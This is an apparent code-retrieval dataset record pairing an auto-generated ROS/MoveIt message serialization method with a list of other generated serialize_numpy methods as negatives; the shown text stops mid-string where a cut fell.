len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms: _v406 = val1.translation _x = _v406 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v407 = val1.rotation _x = _v407 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist: _v408 = val1.linear _x = _v408 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v409 = val1.angular _x = _v409 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench: _v410 = val1.force _x = _v410 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v411 = val1.torque _x = _v411 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v412 = val1.object _v413 = _v412.header buff.write(_get_struct_I().pack(_v413.seq)) _v414 = _v413.stamp _x = _v414 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v413.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v412.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v415 = _v412.type _x = _v415.key length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v415.db length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v412.primitives) buff.write(_struct_I.pack(length)) for val3 in _v412.primitives: buff.write(_get_struct_B().pack(val3.type)) length = len(val3.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.dimensions.tostring()) length = len(_v412.primitive_poses) buff.write(_struct_I.pack(length)) for val3 in _v412.primitive_poses: _v416 = val3.position _x = _v416 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v417 = val3.orientation _x = _v417 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v412.meshes) buff.write(_struct_I.pack(length)) for val3 in _v412.meshes: length = len(val3.triangles) buff.write(_struct_I.pack(length)) for val4 in val3.triangles: buff.write(val4.vertex_indices.tostring()) length = len(val3.vertices) buff.write(_struct_I.pack(length)) for val4 in val3.vertices: _x = val4 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v412.mesh_poses) buff.write(_struct_I.pack(length)) for val3 in _v412.mesh_poses: _v418 = val3.position _x = _v418 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v419 = val3.orientation _x = _v419 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v412.planes) buff.write(_struct_I.pack(length)) for val3 in _v412.planes: buff.write(val3.coef.tostring()) length = len(_v412.plane_poses) buff.write(_struct_I.pack(length)) for val3 in _v412.plane_poses: _v420 = val3.position _x = _v420 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v421 = val3.orientation _x = _v421 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v412.subframe_names) buff.write(_struct_I.pack(length)) for val3 in _v412.subframe_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(_v412.subframe_poses) buff.write(_struct_I.pack(length)) for val3 in _v412.subframe_poses: _v422 = val3.position _x = _v422 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v423 = val3.orientation _x = _v423 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_b().pack(_v412.operation)) length = len(val1.touch_links) buff.write(_struct_I.pack(length)) for val2 in val1.touch_links: length = len(val2) if python3 or type(val2) == unicode: val2 = val2.encode('utf-8') length = len(val2) buff.write(struct.pack('<I%ss'%length, length, val2)) _v424 = val1.detach_posture _v425 = _v424.header buff.write(_get_struct_I().pack(_v425.seq)) _v426 = _v425.stamp _x = _v426 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v425.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v424.joint_names) buff.write(_struct_I.pack(length)) for val3 in _v424.joint_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(_v424.points) buff.write(_struct_I.pack(length)) for val3 in _v424.points: length = len(val3.positions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.positions.tostring()) length = len(val3.velocities) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.velocities.tostring()) length = len(val3.accelerations) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.accelerations.tostring()) length = len(val3.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.effort.tostring()) _v427 = val3.time_from_start _x = _v427 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) buff.write(_get_struct_d().pack(val1.weight)) buff.write(_get_struct_B().pack(self.goal.planning_options.planning_scene_diff.robot_state.is_diff)) _x = self.goal.planning_options.planning_scene_diff.robot_model_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.planning_options.planning_scene_diff.fixed_frame_transforms) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.fixed_frame_transforms: _v428 = val1.header buff.write(_get_struct_I().pack(_v428.seq)) _v429 = _v428.stamp _x = _v429 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v428.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1.child_frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v430 = val1.transform _v431 = _v430.translation _x = _v431 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v432 = _v430.rotation _x = _v432 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values: length = len(val1.enabled) buff.write(_struct_I.pack(length)) pattern = '<%sB'%length buff.write(val1.enabled.tostring()) length = len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values) buff.write(_struct_I.pack(length)) pattern = '<%sB'%length buff.write(self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values.tostring()) length = len(self.goal.planning_options.planning_scene_diff.link_padding) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.link_padding: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_get_struct_d().pack(val1.padding)) length = len(self.goal.planning_options.planning_scene_diff.link_scale) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.link_scale: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_get_struct_d().pack(val1.scale)) length = len(self.goal.planning_options.planning_scene_diff.object_colors) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.object_colors: _x = val1.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v433 = val1.color _x = _v433 buff.write(_get_struct_4f().pack(_x.r, _x.g, _x.b, _x.a)) length = len(self.goal.planning_options.planning_scene_diff.world.collision_objects) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.world.collision_objects: _v434 = val1.header buff.write(_get_struct_I().pack(_v434.seq)) _v435 = _v434.stamp _x = _v435 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v434.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v436 = val1.type _x = _v436.key length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v436.db length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val1.primitives) buff.write(_struct_I.pack(length)) for val2 in val1.primitives: buff.write(_get_struct_B().pack(val2.type)) length = len(val2.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val2.dimensions.tostring()) length = len(val1.primitive_poses) buff.write(_struct_I.pack(length)) for val2 in val1.primitive_poses: _v437 = val2.position _x = _v437 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v438 = val2.orientation _x = _v438 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(val1.meshes) buff.write(_struct_I.pack(length)) for val2 in val1.meshes: length = len(val2.triangles) buff.write(_struct_I.pack(length)) for val3 in val2.triangles: buff.write(val3.vertex_indices.tostring()) length = len(val2.vertices) buff.write(_struct_I.pack(length)) for val3 in val2.vertices: _x = val3 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(val1.mesh_poses) buff.write(_struct_I.pack(length)) for val2 in val1.mesh_poses: _v439 = val2.position _x = _v439 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v440 = val2.orientation _x = _v440 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(val1.planes) buff.write(_struct_I.pack(length)) for val2 in val1.planes: buff.write(val2.coef.tostring()) length = len(val1.plane_poses) buff.write(_struct_I.pack(length)) for val2 in val1.plane_poses: _v441 = val2.position _x = _v441 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v442 = val2.orientation _x = _v442 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(val1.subframe_names) buff.write(_struct_I.pack(length)) for val2 in val1.subframe_names: length = len(val2) if python3 or type(val2) == unicode: val2 = val2.encode('utf-8') length = len(val2) buff.write(struct.pack('<I%ss'%length, length, val2)) length = len(val1.subframe_poses) buff.write(_struct_I.pack(length)) for val2 in val1.subframe_poses: _v443 = val2.position _x = _v443 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v444 = val2.orientation _x = _v444 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_b().pack(val1.operation)) _x = self buff.write(_get_struct_3I().pack(_x.goal.planning_options.planning_scene_diff.world.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.world.octomap.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_7d3I().pack(_x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.w, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_get_struct_B().pack(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary)) _x = self.goal.planning_options.planning_scene_diff.world.octomap.octomap.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_get_struct_d().pack(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.resolution)) length = len(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.data) buff.write(_struct_I.pack(length)) pattern = '<%sb'%length buff.write(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.data.tostring()) _x = self buff.write(_get_struct_3BidBid().pack(_x.goal.planning_options.planning_scene_diff.is_diff, _x.goal.planning_options.plan_only, _x.goal.planning_options.look_around, _x.goal.planning_options.look_around_attempts, _x.goal.planning_options.max_safe_execution_cost, _x.goal.planning_options.replan, _x.goal.planning_options.replan_attempts, _x.goal.planning_options.replan_delay)) except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self))))) except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def serialize_numpy(self, buff, numpy):\n try:\n pass\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_2d2q14dq.pack(_x.tcp, _x.ori, _x.zone, _x.vacuum, _x.workx, _x.worky, _x.workz, _x.workq0, _x.workqx, _x.workqy, _x.workqz, _x.toolx, _x.tooly, _x.toolz, _x.toolq0, _x.toolqx, _x.toolqy, _x.toolqz, _x.ret))\n _x = self.msg\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n pass\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n pass\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(_struct_B.pack(self.result))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.tsp_turtles\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.conveyor_turtle\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.catch_turtle\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n length = len(self.name)\n buff.write(_struct_I.pack(length))\n for val1 in self.name:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.position)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.position.tostring())\n length = len(self.velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.velocity.tostring())\n length = len(self.effort)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.effort.tostring())\n length = len(self.position_command)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.position_command.tostring())\n length = len(self.velocity_command)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.velocity_command.tostring())\n length = len(self.effort_command)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.effort_command.tostring())\n length = len(self.accelerometer)\n buff.write(_struct_I.pack(length))\n for val1 in self.accelerometer:\n _x = val1\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n length = len(self.gyro)\n buff.write(_struct_I.pack(length))\n for val1 in self.gyro:\n _x = val1\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n length = len(self.orientation)\n buff.write(_struct_I.pack(length))\n for val1 in self.orientation:\n _x = val1\n buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.deflection)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.deflection.tostring())\n length = len(self.deflection_velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.deflection_velocity.tostring())\n length = len(self.motor_velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.motor_velocity.tostring())\n length = len(self.motor_current)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.motor_current.tostring())\n length = len(self.motor_winding_current)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.motor_winding_current.tostring())\n length = len(self.motor_sensor_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.motor_sensor_temperature.tostring())\n length = len(self.motor_winding_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.motor_winding_temperature.tostring())\n length = len(self.motor_housing_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.motor_housing_temperature.tostring())\n length = len(self.board_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.board_temperature.tostring())\n length = len(self.processor_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.processor_temperature.tostring())\n length = len(self.voltage)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.voltage.tostring())\n length = len(self.led_color)\n buff.write(_struct_I.pack(length))\n for val1 in self.led_color:\n _x = val1\n buff.write(_get_struct_4f().pack(_x.r, _x.g, _x.b, _x.a))\n length = len(self.sequence_number)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(self.sequence_number.tostring())\n length = len(self.receive_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(self.receive_time.tostring())\n length = len(self.transmit_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(self.transmit_time.tostring())\n length = len(self.hardware_receive_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(self.hardware_receive_time.tostring())\n length = len(self.hardware_transmit_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(self.hardware_transmit_time.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_ihih3i3d2i2d().pack(_x.originId, _x.originType, _x.destinationId, _x.destinationType, _x.range, _x.ts, _x.seq, _x.rxPower, _x.channel, _x.datarate, _x.prf, _x.preambleLength, _x.txGain, _x.angle))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(_struct_d.pack(self.i))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(_get_struct_b().pack(self.error))\n length = len(self.start_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.start_pos.tostring())\n length = len(self.target_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.target_pos.tostring())\n length = len(self.plans)\n buff.write(_struct_I.pack(length))\n for val1 in self.plans:\n _x = val1.joint\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.trajectory)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(val1.trajectory.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_Q8d().pack(_x.detection_id, _x.confidence, _x.pose.pose.position.x, _x.pose.pose.position.y, _x.pose.pose.position.z, _x.pose.pose.orientation.x, _x.pose.pose.orientation.y, _x.pose.pose.orientation.z, _x.pose.pose.orientation.w))\n buff.write(self.pose.covariance.tostring())\n _x = self\n buff.write(_get_struct_5d().pack(_x.height, _x.bbox_x, _x.bbox_y, _x.bbox_w, _x.bbox_h))\n _x = self.modality\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.embed_vector)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.embed_vector.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_7q.pack(_x.s_x, _x.s_y, _x.f_x, _x.f_y, _x.step_size, _x.bias_param, _x.max_iteration))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_2B2If().pack(_x.role, _x.id, _x.local_time, _x.system_time, _x.voltage))\n buff.write(self.pos_3d.tostring())\n buff.write(self.eop_3d.tostring())\n buff.write(self.vel_3d.tostring())\n buff.write(self.angle_3d.tostring())\n buff.write(self.quaternion.tostring())\n buff.write(self.imu_gyro_3d.tostring())\n buff.write(self.imu_acc_3d.tostring())\n length = len(self.nodes)\n buff.write(_struct_I.pack(length))\n for val1 in self.nodes:\n _x = val1\n buff.write(_get_struct_2B3f().pack(_x.role, _x.id, _x.dis, _x.fp_rssi, _x.rx_rssi))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_h16fh8f().pack(_x.id, _x.age, _x.velocidad_relativa_x, _x.velocidad_relativa_y, _x.velocidad_absoluta_x, _x.velocidad_absoluta_y, _x.velocidad_absoluta_sigma_x, _x.velocidad_absoluta_sigma_y, _x.bounding_box_centro_x, _x.bounding_box_centro_y, _x.bounding_box_largo, _x.bounding_box_ancho, _x.object_box_centro_x, _x.object_box_centro_y, _x.object_box_orientacion, _x.object_box_size_x, _x.object_box_size_y, _x.clasificacion, _x.clasificacion_age, _x.clasificacion_certeza, _x.punto_cercano_x, _x.punto_cercano_y, _x.punto_referencia_x, _x.punto_referencia_y, _x.punto_referencia_sigma_x, _x.punto_referencia_sigma_y))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_12B.pack(_x.hlive, _x.hstate, _x.hfinished, _x.pressure, _x.c1, _x.c2, _x.c3, _x.c4, _x.c5, _x.c6, _x.c7, _x.c8))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n length = len(self.objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.objects:\n _v7 = val1.header\n buff.write(_struct_I.pack(_v7.seq))\n _v8 = _v7.stamp\n _x = _v8\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v7.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.object_class\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.confidence))\n _v9 = val1.roi\n _x = _v9\n buff.write(_struct_4IB.pack(_x.x_offset, _x.y_offset, _x.height, _x.width, _x.do_rectify))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_14d.pack(_x.u0, _x.h0, _x.vl, _x.i0, _x.wv, _x.wh, _x.wi, _x.h_stop, _x.T_gap, _x.v_max, _x.v_min, _x.h_min, _x.i_max, _x.i_min))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), 